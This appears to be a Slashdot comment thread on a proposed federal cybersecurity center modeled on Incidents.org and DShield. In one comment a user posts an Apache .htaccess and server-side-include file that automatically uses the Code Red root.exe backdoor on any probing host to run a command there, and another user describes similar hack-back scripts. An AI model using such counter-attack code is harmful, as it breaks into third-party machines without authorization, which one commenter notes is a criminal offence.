Federal NOC To Be Modeled After Incidents.org / DS

An anonymous reader writes "Computerworld is covering in more detail the new Federal 'Cybersecurity Center.' The article explains that unlike some earlier rumors indicated, the center will not try to build a super-carnivore, but instead use voluntary reports. It will be similar to the SANS Institute's Internet Storm Center, which summarizes contributions submitted to DShield.org. This system of voluntary contributors has been shown to be effective in the past by issuing early warning for a number of major Internet worms, like Code Red, Ramen and SQLSnake. Unlike Symantec's 'for pay ' Deep Sight service, which publishes alerts only to paying members, Incidents.org is a free service."

Re:Attention Slashdorks

[zapfie]

Troll, perhaps, but very true.

follow-up on CodeRed/Nimda

[valmont]

A few months ago i posted a follow-up [slashdot.org] in my /. journal [slashdot.org] on code red and nimda queries sent to my apache server thru my residential dsl connection. I gathered a list of *all* unique queries i've received so far.

I also came-up with a few shell scripts used as CGI to make HTTP requests back to offending hosts, exploiting the very vulnerabilities they're probing me for to, place "WARNING YOU ARE INFECTED" text messages at strategic locations on their hard drives. drop a note on my journal comments if u need more info on that.

Re:follow-up on CodeRed/Nimda

[Sobrique]

The problem with doing this is that you are committing a criminal offence by doing so. You are effectively, and wilfully commiting a breach of some computer law in your country.
It's one of those long discussions for a rainy afternoon, but IMHO you need to be careful doing that. After all, code red/nimda is just a worm, but if someone catches you hacking their server, then it'll be you in trouble.
Some discussion occured on various securityfocus mailing lists regarding this point. (I haven't posted a link, because the load on the security focus website is too high at the moment.)

Re:follow-up on CodeRed/Nimda

[Phroggy]

I made a .htaccess file containing:

AddType text/html .ida
AddHandler server-parsed .ida

Then made a file called default.ida that looks like this (the part between <!-- and --> is all on one big long line):

<HTML>
<HEAD>
<TITLE>Go away.</TITLE>
</HEAD>
<BODY>

This server runs Apache on Linux. It is immune to Microsoft viruses and worms.
<!--#exec cmd="/usr/bin/lynx -dump http://$REMOTE_ADDR/scripts/root.exe\?/c+net+send+ localhost+%22Your+Web+server+has+been+infected+wit h+a+virus.++I+know+this+because+your+server+tried+ to+infect+my+server.++I+sent+you+this+message+beca use+I+am+a+nice+guy.++Someone+else+may+not+be+so+n ice,+and+this+virus+lets+them+steal+your+data,+era se+your+hard+drive,+or+anything+else+they+want.++P lease+fix+your+server,+or+take+it+offline.%22 >/dev/null 2>/dev/null" -->
</BODY>
</HTML>

Re:follow-up on CodeRed/Nimda

[valmont]

very cool :)

wow big dilema

[Christianfreak]

On one hand its free and should provide useful information to keep our networks and computers secure. On the other hand it's run by the government which of course we all know is bad ... choices choices :)

(right now some slashbot's head is exploding! :) )

Now, if only we could report Klez....

[wowbagger]

I just want a way to stop the damn Klez worms I keep getting emailed from pixie.udw.ac.za (a university in South Africa). I've mailed their admin repeatedly, mailed their faculty, even mailed their upstream. The closest thing to a response I've gotten was a response from one of the faculty saying "Yeah, we are getting hammered by that too."

What we need is a good way to force admins to actually ADMINISTER the systems they are responsible for, and should they refuse, to get the upstream to null-route the machine until it is fixed.

Protection or detection?

[Spazholio]

I'm a little unsure of what this will accomplish. Is it only going to alert you to the newest threats out there, or is it actually going to give info on how to protect your computer from them as well? Hopefully, one would think one would naturally lead to the other, but as someone already said, this IS the government running it. =)

Duplicating private sector

[sjanich]

WOUldn't it make more sense to instead of spending money building something like incidents.org, to fund incidents.org partially with grant money from the feds, so that it can beef up somewhat, and create a Federal liason team? They would spend less and get their goal quicker.

Re:Duplicating private sector

[tubabeat]

It would, any fool could see that. So... given that governments usually have a high concentration of fools... we could reasonably assume they already worked that out. Which can only mean that they want to control it. Now why might a government want to supress computer security alerts...?

Re:Duplicating private sector

[RollingThunder]

Not if you want to start doing DShield-like data correlation, but from the ubersecure (snicker) internal government systems.

People would have an absolute bird if it got out that attempted access logs from #insert government agency here# were being sent to a NGO for correlation.

Although I won't deny that some greenbacks for incidents.org would be a great idea.

Good Idea

[extagboy]

Seems like a good idea as long as anonymous contributions from the public are welcome and uncensored. If it turns into a government throttled source of information, it won't be any good to anyone.

IT purchases must be _certified_ for security?

[cfadam]

Did anyone else notice this statement:

"In an interview with Computerworld last month, Clarke said the plan may include a governmentwide policy that requires all IT purchases to be independently certified for security prior to approval."

I would like to know what it takes for a product to get "independently certified for security", and how would/does this affect OSS?

(If this has been posted and answered in the past, please mod me down.)

Re:IT purchases must be _certified_ for security?

[Louis_Wu]

I would like to know what it takes for a product to get "independently certified for security", and how would/does this affect OSS?

If this has been posted and answered in the past, please mod me down.

It has been posted, but not sufficiently answered. :)

The tentative answers which I have seen seem to end up saying that any commercial certification would probably cost too much for OSS/FREE and that any government cert would be biased by established software companies "adding their expertise and experience to the process". (Unless those commercial certs were aimed specifically at OSS/FREE, in which case they would be the victims of discrediting campaigns by the other commercial certs. Which would leave the costly certs as the only "respectable" certs around.) Much weeping and nashing of teeth, but I still haven't seen any good solutions. Maybe I've missed something.

Side note, we do need companies giving input to government regarding what those corporations are knowledgable about and good at, but that needs to be tempered by honest gov't types who have a clue about the industry. Think USPTO with clueful people running it. EX: I'm not much of a programmer, but if I were reviewing a patent application for a new sort method, I would have a good idea about where to start looking for info.

Why do you care?

[alexhmit01]

You should want OSS because it respects your rights. You shouldn't care what others use.

The government (or a company) wants a verified, legit product? Fine. They don't use an OSS OS (like a downloaded copy of Linux), they buy copies of Redhat Linux.

Why do you care?

Why is everyone here worried what other people are doing?

Alex

Re:Why do you care?

[cfadam]

I care because I don't want to see open-source security products viewed as a lesser-quality product due to funding issues on the part of its contributors. If the government is going to install something as important as security software, they should have the right to choose the best product period, not just the best commercial product.

If the cost of certification is too great, that may also stop smaller security companies from being evaluated as well, also due to funding problems.

We shouldn't trust our nation's security only to those with deep pockets.

- A

What's the matter

[Anonymous Coward]

Even trolls hate this story? Damn.. such a boring story...

bloated budgets

[ohzero]

I remember reading the exact same article about the NIPC (mentioned in this article), and how it was supposed to do all the things that this cetner is supposed to do. We have highly paid people running around in very costly facilities who are definately not the most clued people in the industry, because regardless of the dot-com fallout, network security salaries haven't dropped too much (xxx,000). I wonder if maybe next year, we can build another center so that it can collect data from this new center, plus the NIPC and whatever other centers have been built to either collect data on other centers or from actual events. This is a crock of shit.

Gov's first simple steps, NIST will lead on

[turtleshadow]

This is NOT news to anyone that has been following CSRC NIST [nist.gov] SP-800 publications that have been trickling out of Gaithersburg MD for some time. They are even reaching out to small business [nist.gov]

Establishing a decent list of the telco demarks and physical inventory and assesment of vital devices was the 1st thing and probably done to a good tolerance. This is the next step. Get all the traffic reports going to a central NOC.

NIST have been writing fairly decent and comprehensive publications that deal with Firewall, email, WAP and assesment of security position. And surprisingly the Public it seems has been regularly asked to comment based what is occuring everyday in business IT.

Currently with the release of the ASSET evaluation tool Fed agencies and departments no longer have the rug to sweep year's of poor planning and practice under.

I'd fully expect that in a few years, use of this Federal NOC and its services of cross site and network attack detection ability could be put into a FIPS standard of some sort. Those that deal with GOV will have to deal with GOVs rules.

If I was a federal law enforcement agency it would be an easy sell.

Sharing GOV net traffic information parallels the concept of sharing "most wanted" lists, prison rolls, evidence research, cold leads and what not.

I just wish the US Gov would also do the same for spammers for theft of services!

Its not a surprise that nearly 100% of all Federal buildings and critical facilites have a small number of meatspace entry points which are screened and watched, why should we expect different for Internet, Extranet and Intranet spaces.

I foresee the American Internet much like American Banks in the 1930's. We are past the "glory" bandits like Bonny and Clyde stage and are just getting weary of the wanna be criminals.

It was about that time the FBI was established to chase after cross juristiction criminals. The Bureau with many other institutions like Insurance companies insisted Banks put in physical measures, guards, bars, silent and audible alarms, robbery training for staff, proof of executing government regulations, etc.

I predict in 8 years Insurance industry will up your premiums for not having a syslog server, Not having a written and practiced fair use policy with employees, not having firewalls between vital resources and untrusted segments of your business. Heaven help come audit time!

My friends computers are rock, metal, plastic and air -- not majik. Get over it.

Reading any of the NIST program documents and having any experience with business consolidation helps in what to forecast next.

My bet is the US Gov to institute internal national EDI networks based on XML exchanges to negotiate terms of service and usage of resources. Quasi-Privatized EDI would preclude any undesireables and non-participant networks.

My 2c